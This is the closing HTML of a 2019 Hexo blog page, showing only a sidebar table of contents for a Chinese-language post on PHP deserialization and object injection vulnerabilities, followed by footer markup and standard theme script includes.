      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#php反序列化漏洞"><span class="nav-number">1.</span> <span class="nav-text">php反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#了解php对象概念以及php对象的一些简单特性"><span class="nav-number">1.1.</span> <span class="nav-text">了解php对象概念以及php对象的一些简单特性</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#了解什么是php序列化以及序列化的一些格式"><span class="nav-number">1.2.</span> <span class="nav-text">了解什么是php序列化以及序列化的一些格式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#明白php对象注入的成因"><span class="nav-number">1.3.</span> <span class="nav-text">明白php对象注入的成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常见的注入点"><span class="nav-number">1.4.</span> <span class="nav-text">常见的注入点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识补充"><span class="nav-number">1.5.</span> <span class="nav-text">知识补充</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Vergilben</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">21.2k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  
  <script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
  <script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>


  

</body>
</html>
